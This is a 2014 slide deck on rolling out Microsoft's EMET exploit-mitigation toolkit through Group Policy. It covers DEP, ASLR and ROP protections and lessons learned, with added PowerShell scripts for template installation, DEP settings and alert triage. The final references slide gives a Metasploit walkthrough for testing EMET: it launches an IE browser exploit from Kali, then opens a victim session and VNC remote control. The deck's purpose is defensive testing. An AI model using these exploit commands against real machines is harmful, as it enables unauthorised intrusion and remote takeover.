
  • Like what you hear? Tweet it using: #Sec360 5/13/2014

    Technical details

    Rolling out in a Corporate Environment

    Lessons Learned

    Tips for Maximum security settings

    Trademarks owned by their respective owners

  • WHY RUN EMET? Do you have top-notch anti-malware? Are your PCs still being exploited?

    § No anti-malware product is 100% effective
    § Zero-day exploits for IE / Flash / Adobe Reader / Java / etc.

    Would you like to improve your odds?

    Blocks “zero-day” memory-corruption exploits (the exploit fails before its payload runs, so no signature is needed)
    Supplements existing anti-malware
    Supported by Microsoft
    Configured through Group Policy
    Minimal overhead

    But wait, there’s more…

    It’s FREE!!!

  • OK, WHAT IS EMET? EMET: Enhanced Mitigation Experience Toolkit

    A free software package from Microsoft
    § Available since 2009 / officially supported since 2011
    § Current version is 4.1 (& 5.0 technical preview)

    Blocks memory corruption / buffer overflow exploits
    § Example: it randomizes the memory locations an exploit would otherwise hard-code (ASLR)

    Low overhead: EMET’s DLL is injected into each protected process through the Application Compatibility Framework, so the mitigations run inside the application rather than as a separate scanning program
    § No need to recompile applications

    Install on every workstation

  • WHY RUN EMET? Because Microsoft recommends it:

    4/26/2014 - Microsoft KB2963983 IE Vulnerability – “Workarounds […] Deploy the Enhanced Mitigation Experience Toolkit”

    3/24/2014 – Microsoft SRD2953095 Word Vulnerability – “our tests showed that EMET default configuration can block the exploits seen in the wild.”

    3/11/2014 – Microsoft MS14-012 IE Vulnerability – “Does EMET help mitigate attacks that could attempt to exploit these vulnerabilities? Yes.”

    7/28/2010 – Microsoft FF859539 IE Aurora Vulnerability – “EMET can help prevent successful exploitation on systems lacking the update.”

    … and it blocks many more for Flash / Adobe Reader / Java / etc…

  • WHERE IT WORKS BEST Workstations typically get infected in two ways:

    1. Workstation has vulnerable software
    § E.g. unpatched/zero-day Adobe, Java, Office, browser plug-ins
    § Users visit an automated exploit web site, or open a malicious email document
    -> Install EMET*

    2. Users get tricked into running bad software
    § E.g. an attachment named Payroll.exe
    -> Train users; EMET is less effective here (no memory corruption is involved, the user runs the payload directly)

    * In addition to other mitigations such as anti-malware

  • TECHNICAL: PROTECTION OVERVIEW Three Types of Protection:

    1. System Wide
    § Programs can be coded to opt-in or opt-out
    2. Per-Program
    § Enforces protection on specific programs
    3. Per-Web-Site
    § Alerts users to fraudulent SSL/TLS certificates

  • TECHNICAL: 1. SYSTEM-WIDE System Wide Protections:

    DEP - Data Execution Prevention
    § Marks data (heap/stack) memory as non-executable
    § Requires support by the CPU (Intel=XD, AMD=NX)
    SEHOP - Structured Exception Handler Overwrite Protection
    § OS walks the exception handler chain to validate it before using it
    ASLR - Address Space Layout Randomization
    § Loads modules at different memory locations each boot, so an exploit cannot rely on fixed addresses

  • TECHNICAL: 1. SYSTEM-WIDE System-Wide Protection Options: DEP / SEHOP / ASLR

    Always On - All programs will use it
    Opt-Out - On, except for programs written to opt out
    Opt-In - Off, except for programs written to opt in (and those EMET is configured to protect per-program)
    Disabled - No programs will use it

    Opt-In vs. Opt-Out depends on risk tolerance/resources

    Opt-In is the Microsoft recommendation
    § Less protection, but fewer compatibility issues

  • TECHNICAL: 2. PER-PROGRAM Per-program Protection Options:

    Memory Protections:
    § DEP / Bottom-Up ASLR / Mandatory ASLR / Heap Spray (pre-allocates the addresses exploits commonly spray to) / Null Page (pre-allocates page zero)
    Return Oriented Programming (ROP):
    § Load Library checks (no DLL loads from UNC paths) / Memory protection checks (disallow making the stack executable) / Caller Checks (critical functions may only be reached via “call”, not “return”) / Stack Pivot (detect if the stack pointer has been pivoted out of the thread’s stack) / Simulate execution flow (detect ROP gadgets after a critical function returns)
    Other:
    § SEHOP / EAF (Export Address Table Filtering - blocks shellcode’s API address lookup) / ASR (Attack Surface Reduction, in v5.0, blocks specific plug-ins from loading)

    Note: Any protection applied to a browser protects all its plug-ins too, because they load into the browser process

  • TECHNICAL: 3. CERTIFICATE TRUST Per-web-site (v4): Certificate Trust Pinning

    Deters an attacker from using a compromised certificate vendor to intercept traffic (DigiNotar/Google) in IE
    § E.g. can only use DigiCert/Equifax/GeoTrust/Thawte/VeriSign certs
    § Config: MS / Yahoo / Skype / Twitter / Facebook
    § Might require maintenance with non-MS entries
    § Can specify expiration date, allow same country, etc.

    Only warns users, doesn’t block
    Not configurable by group policy

    Certificate Trust Pinning (example rule):
    Certificate Authority must be: DigiCert/Equifax/GeoTrust/Thawte/VeriSign
    E.g. but not DigiNotar


  • Install Microsoft .Net 4.0 (& KB 2790907 on Win 8/2012)

    Download EMET from

    Install
    § It will ask if you want Recommended Settings
    § If no configuration is done, EMET doesn’t protect (installing alone protects nothing)

    Start GUI

    Settings
    § System-Wide: Always On / App Opt-Out / App Opt-In / Disabled
    § Per-program: v3 / ROP / Mitigation Settings / Manually Adding
    § Web Certificate CA Pinning

  • …TESTING ON A PC Start up the GUI:

    Start Menu -> EMET -> EMET GUI

    Sample Test Settings:
    DEP: Opt In
    SEHOP: Opt In
    ASLR: Opt In
    Pinning: Enabled

  • …TESTING ON A PC Import per-Application & Cert Pinning Settings:

    Import -> Popular
    § Popular has more applications than Recommended (e.g. adds the Firefox and Chrome browsers)

    Import -> CertTrust
    § Contains SSL/TLS certificate pinning rules for a few web sites

  • ROLLING OUT: PREP Download EMET (& .Net 4)

    Extract Group Policy ADM* files
    § msiexec /a "EMET Setup.msi" /qb TARGETDIR="c:\temp"
    § (or copy from the EMET directory if EMET is already installed)

    Install Group Policy ADM* files
    § Only needed on machines that will modify group policy
    § Copy EMET.admx and EMET.adml from c:\temp\group policy files to \Windows\PolicyDefinitions (admx) and \Windows\PolicyDefinitions\en-US (adml)
    § Note: ADM* files are different for each EMET version - use the ones from the version you are deploying

    Note: Create a test OU container for each department; drag and drop test PCs into it

    Note: Create a Group Policy Object, then link it to each test OU container

    Note: The three “Default Protections” lists in the EMET policy (Internet Explorer, Recommended Software, Popular Software) cover different sets of applications; they are not interchangeable, so enable the ones you actually want

    Include a shutdown script to apply the group policy: EMET_Conf --refresh
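The prep steps above as one script. This is an added example, not code from the deck or from Microsoft; it assumes an MSI path and extraction folder under C:\temp, a local ADMX store (point $PolicyStore at your SYSVOL central store if you have one), that EMET_Conf.exe lives in an "EMET*" folder under Program Files, and PowerShell 4 or later for Get-FileHash. Run it elevated on the machine that edits Group Policy.

```powershell
# Added example (not from the original deck): "Rolling out: prep" automated.
# Assumptions: MSI path, extraction folder, local policy store, EMET_Conf.exe
# location under Program Files\EMET*. Run elevated.
param(
    [string]$Msi         = 'C:\temp\EMET Setup.msi',
    [string]$ExtractDir  = 'C:\temp\emet-extract',
    [string]$PolicyStore = "$env:WINDIR\PolicyDefinitions",   # or \\<domain>\SYSVOL\<domain>\Policies\PolicyDefinitions
    [string]$ScriptOut   = 'C:\temp\emet-refresh.ps1'
)
$ErrorActionPreference = 'Stop'

# 1. Administrative install: unpacks the MSI payload, installs nothing
New-Item -ItemType Directory -Force -Path $ExtractDir | Out-Null
$p = Start-Process msiexec.exe -ArgumentList "/a `"$Msi`" /qb TARGETDIR=`"$ExtractDir`"" -Wait -PassThru
if ($p.ExitCode -ne 0) { throw "msiexec /a failed with exit code $($p.ExitCode)" }

# 2. Find the template pair. Search instead of hardcoding the folder, because the
#    layout (and the templates themselves) change between EMET versions.
$admx = Get-ChildItem $ExtractDir -Recurse -Filter 'EMET.admx' | Select-Object -First 1
$adml = Get-ChildItem $ExtractDir -Recurse -Filter 'EMET.adml' | Select-Object -First 1
if (-not $admx -or -not $adml) { throw 'EMET.admx / EMET.adml not found in the extracted MSI' }

# 3. Install into the policy store, replacing any template from an older EMET
$langDir = Join-Path $PolicyStore 'en-US'
New-Item -ItemType Directory -Force -Path $langDir | Out-Null
Copy-Item $admx.FullName -Destination $PolicyStore -Force
Copy-Item $adml.FullName -Destination $langDir -Force

# 4. Prove the store now holds the version you just extracted (ADM* differ per version)
$src = (Get-FileHash $admx.FullName -Algorithm SHA256).Hash
$dst = (Get-FileHash (Join-Path $PolicyStore 'EMET.admx') -Algorithm SHA256).Hash
if ($src -ne $dst) { throw 'EMET.admx in the policy store does not match the extracted template' }
"Installed EMET.admx (SHA256 $($src.Substring(0,12))...) into $PolicyStore"

# 5. Shutdown script for the GPO: forces EMET to re-read policy, so settings pushed
#    after EMET was installed actually apply. Single-quoted here-string: the script
#    text is written verbatim and evaluated on the client at shutdown.
@'
$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }
$conf  = foreach ($r in $roots) {
    Get-ChildItem (Join-Path $r 'EMET*') -Filter 'EMET_Conf.exe' -ErrorAction SilentlyContinue
}
$conf = $conf | Select-Object -First 1
if ($conf) { & $conf.FullName --refresh }
'@ | Set-Content -Path $ScriptOut -Encoding ASCII
"Wrote $ScriptOut; attach it under Computer Configuration > Policies > Windows Settings > Scripts (Shutdown)"
```

The hash check in step 4 is the part worth keeping even if you do the rest by hand: a stale EMET.admx from a previous version in the central store will silently show the wrong set of settings in the Group Policy editor.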

  • ROLLING OUT: SOFTWARE Roll out .Net 4.0 (& KB 2790907 on Win 8/2012)

    Roll out EMET using Group Policy or other method

  • TROUBLESHOOTING EMET notification: Popup Window

    OS Application log:
    § EMET writes an event for each mitigation it triggers
    § Office plug-ins that EMET stops also produce an Application Error event; search the disk for the faulting module it names to identify the add-in

  • EMET V4 KNOWN ISSUES Group Policy settings don’t display properly in EMET GUI
    § Commands that will display them:
    EMET_Conf --list
    reg query HKLM\Software\Policies\Microsoft\EMET

    Certificate Trust Pinning limitations:
    § EMET Group Policy doesn’t contain those settings
    § Not available for the “Modern” IE app in Windows 8

    Review the included EMET User’s Guide and the EMET web forum for additional caveats

  • LESSONS LEARNED 1. DEP breaks legacy applications
    § Roll out EMET to the enterprise in phases
    § Set the system-wide DEP to Opt-In, not Always-On
    § E.g. breaks end-of-life versions of Crystal Reports
    § If DEP is Opt-In you can configure an individual workstation to opt a specific application out of DEP: Computer Properties / Advanced / Performance / DEP
    § Can use the free Microsoft Application Compatibility Toolkit to create a “shim” that opts the application out of 32-bit DEP, and roll the shim out; Compatibility Fix setting: “Disable NX”

    2. Apply Group Policy settings before installing
    § Settings didn’t always apply afterwards
    § Can get the settings to apply by adding a Group Policy shutdown script that runs “EMET_Conf --refresh”

    3. Uninstalling EMET doesn’t revert system-wide changes (DEP)
    § Revert the system-wide changes, then uninstall
    § Tools - Windows 7: bcdedit
    § Possible BitLocker issue with DEP changes (the DEP setting lives in the boot configuration data, which BitLocker validates at boot)

    4. IE developers may need EAF disabled for IE; WinZip may need an update for Outlook plug-in compatibility
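The system-wide options from the Technical section and lessons 1 and 3 above, in one script: read the current DEP/SEHOP/ASLR state, revert DEP with bcdedit before uninstalling, and opt a single legacy 32-bit program out of DEP without touching the global policy. This is an added example, not the deck's or Microsoft's code. The WMI and registry names are Windows' own; the "DisableNXShowUI" AppCompat layer is, to my knowledge, what the Computer Properties DEP dialog writes, but treat that as an assumption and verify on a test PC. The Crystal Reports path is hypothetical. Run elevated.

```powershell
# Added example (not from the original deck). Run elevated on Windows 7.

# Win32_OperatingSystem.DataExecutionPrevention_SupportPolicy values
$depNames = @{ 0 = 'AlwaysOff'; 1 = 'AlwaysOn'; 2 = 'OptIn'; 3 = 'OptOut' }

function Get-SystemWideMitigations {
    $os = Get-WmiObject Win32_OperatingSystem
    # SEHOP: DisableExceptionChainValidation 0 = on system-wide, 1 = off; absent = OS default
    $sehop = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel' `
                 -Name DisableExceptionChainValidation -ErrorAction SilentlyContinue
    # ASLR: MoveImages 0 = off, 1 = opt-in (default), 0xFFFFFFFF = always on; absent = OS default
    $aslr  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management' `
                 -Name MoveImages -ErrorAction SilentlyContinue
    [pscustomobject]@{
        DEP        = $depNames[[int]$os.DataExecutionPrevention_SupportPolicy]
        HardwareNX = $os.DataExecutionPrevention_Available        # CPU supports XD/NX
        SEHOP      = if ($sehop) { $sehop.DisableExceptionChainValidation } else { 'not set (OS default)' }
        ASLR       = if ($aslr)  { $aslr.MoveImages }             else { 'not set (OS default)' }
    }
}

function Set-DepPolicy {
    param([ValidateSet('OptIn','OptOut','AlwaysOn','AlwaysOff')][string]$Policy = 'OptIn')
    # Lesson 3: run this BEFORE uninstalling EMET; the uninstaller leaves the BCD
    # setting as EMET left it. On BitLocker PCs suspend protection first
    # (manage-bde -protectors -disable C:) because the BCD change is validated at boot.
    bcdedit.exe /set '{current}' nx $Policy
    if ($LASTEXITCODE -ne 0) { throw "bcdedit failed with exit code $LASTEXITCODE" }
    "DEP policy set to $Policy; takes effect after reboot"
}

function Disable-DepForApp {
    param([Parameter(Mandatory)][string]$ExePath)
    # Per-application exclusion, the same AppCompat layer the Computer Properties >
    # Advanced > Performance > DEP dialog writes (assumption, verify on a test PC).
    # Only meaningful for 32-bit images, and ignored when the system-wide policy is
    # AlwaysOn, which is why the deck says "Always On won't allow fixes to work".
    if (-not (Test-Path $ExePath)) { throw "Not found: $ExePath" }
    if ((Get-SystemWideMitigations).DEP -eq 'AlwaysOn') {
        throw 'System-wide DEP is AlwaysOn; per-application exclusions are ignored'
    }
    $layers = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers'
    if (-not (Test-Path $layers)) { New-Item $layers -Force | Out-Null }
    New-ItemProperty -Path $layers -Name $ExePath -Value 'DisableNXShowUI' -PropertyType String -Force | Out-Null
    "DEP exclusion written for $ExePath"
}

# Read-only by default; uncomment the change you actually want.
Get-SystemWideMitigations
# Set-DepPolicy -Policy OptIn
# Disable-DepForApp 'C:\Program Files (x86)\Crystal Reports\crw32.exe'   # hypothetical path
```

The first function is also the quickest way to see whether a "reverted" machine really went back to OptIn after the reboot, since the GUI's system-wide tab reads the same values.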

  • LESSONS LEARNED: THE GOOD POINTS 5. Office/IE issues only when starting/closing the application
    § A non-compatible add-in, one user a week issue
    § Users claim no impact on them
    § Yes, seriously – I asked twice

    6. Fun to get notified if logging workstations centrally
    § Malware tends to give multiple EMET alerts
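Point 6 above, as a triage rule over centrally collected EMET events: one alert from one add-in at application start is the compatibility pattern, a burst of different mitigations in the same browser process is the exploit pattern. This is an added example, not code from the deck; the "EMET" provider name and the message wording the regex expects are assumptions based on EMET 4.x logs (adjust to your version), and the sample records are constructed.

```powershell
# Added example (not from the original deck): triage EMET Application-log alerts
# from many workstations. Message format and provider name are assumptions.

function ConvertFrom-EmetMessage {
    param([string]$Message)
    # Expected forms (assumed): "EMET detected EAF mitigation and will close the application: iexplore.exe"
    #                           "EMET detected StackPivot mitigation in firefox.exe"
    if ($Message -match 'EMET detected (?<mit>\S+) mitigation.*?(?:application:|\bin)\s+(?<proc>\S+)') {
        return [pscustomobject]@{ Mitigation = $Matches.mit; Process = $Matches.proc }
    }
    return $null
}

function Get-EmetAlertSummary {
    param(
        [Parameter(Mandatory)][object[]]$Events,   # objects with MachineName, TimeCreated, Message
        [int]$WindowMinutes  = 10,                 # burst window
        [int]$BurstThreshold = 3                   # alerts inside the window that count as a burst
    )
    $parsed = foreach ($e in $Events) {
        $m = ConvertFrom-EmetMessage $e.Message
        if ($m) {
            [pscustomobject]@{ Host = $e.MachineName; Time = [datetime]$e.TimeCreated
                               Mitigation = $m.Mitigation; Process = $m.Process }
        }
    }
    foreach ($group in ($parsed | Group-Object Host)) {
        $sorted = @($group.Group | Sort-Object Time)
        $burst  = $false
        # Sliding window: any $BurstThreshold consecutive alerts within $WindowMinutes
        for ($i = 0; $i + $BurstThreshold - 1 -lt $sorted.Count; $i++) {
            $span = $sorted[$i + $BurstThreshold - 1].Time - $sorted[$i].Time
            if ($span.TotalMinutes -le $WindowMinutes) { $burst = $true; break }
        }
        $mits  = @($sorted | ForEach-Object Mitigation | Sort-Object -Unique)
        $procs = @($sorted | ForEach-Object Process    | Sort-Object -Unique)
        $verdict = if ($burst -and $mits.Count -ge 2) { 'INVESTIGATE' }   # several mitigations fired in quick succession
                   elseif ($burst)                    { 'review' }        # repeated hits, single mitigation
                   else                               { 'likely compat' } # the one-user-a-week add-in case
        [pscustomobject]@{ Host = $group.Name; Alerts = $sorted.Count
                           Mitigations = ($mits -join ','); Processes = ($procs -join ','); Verdict = $verdict }
    }
}

# Live collection on one host (assumed provider name):
#   Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'EMET' } -MaxEvents 500

# Constructed sample: a compat false positive on PC-A, an exploit-like burst on PC-B
$sample = @(
    [pscustomobject]@{ MachineName = 'PC-A'; TimeCreated = '2014-05-01 08:02:10'
                       Message = 'EMET detected EAF mitigation and will close the application: OUTLOOK.EXE' }
    [pscustomobject]@{ MachineName = 'PC-B'; TimeCreated = '2014-05-01 10:15:00'
                       Message = 'EMET detected HeapSpray mitigation and will close the application: iexplore.exe' }
    [pscustomobject]@{ MachineName = 'PC-B'; TimeCreated = '2014-05-01 10:15:04'
                       Message = 'EMET detected StackPivot mitigation and will close the application: iexplore.exe' }
    [pscustomobject]@{ MachineName = 'PC-B'; TimeCreated = '2014-05-01 10:16:30'
                       Message = 'EMET detected Caller mitigation and will close the application: iexplore.exe' }
)
Get-EmetAlertSummary -Events $sample | Format-Table -AutoSize
```

With the sample data PC-A comes out as "likely compat" and PC-B as "INVESTIGATE". Feed it the output of Get-WinEvent from your collector instead of $sample; the thresholds are deliberately parameters, since what counts as a burst depends on how noisy your add-ins are.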

  • TIPS FOR EXTRA SECURITY Microsoft’s recommendation for Windows 7:
    § “Opt-in” for System-wide settings
    § “Recommended Software” (IE/Office/Adobe/Java) for Per-application settings

    A better recommendation:
    § Add “Popular Software” for Per-application settings
    § Adds other applications such as the Firefox and Chrome web browsers
    § Big bang for the buck with minimal issues - DO IT!

    Maximum settings: Not a recommendation with legacy software
    § “Opt-out” for System-wide settings (“Always On” won’t allow per-application fixes to work)
    § Breaks DEP with 32-bit legacy applications - possibly not worth the extra effort
    § Create and deploy “shims” to fix the applications

  • REFERENCES Microsoft EMET Homepage
    § Download link has the User Guide

    EMET Support Forum

    Microsoft Videos
    § Tech:
    § Non-Tech:
    § EMET 4.1/5.0 TP:

    Testing EMET using Metasploit w/ Armitage GUI
    § Systems:
    § Windows 7
    § Metasploit / Armitage on Kali 1.0 (~BackTrack)
    § msfupdate; Kali menu: System/Metasploit/Start, Exploit/Net/Armitage
    § Exploit (msfconsole on Kali):
    use exploit/windows/browser/ms11_003_ie_css_import
    set SRVPORT 80
    set URIPATH funny
    exploit -j
    § (Win7) Browse to http://server/funny
    § (Kali console) sessions -l, then sessions -i 1, then run vnc

  • QUESTIONS? Contact:

    Chris Covington, CISSP

    [email protected]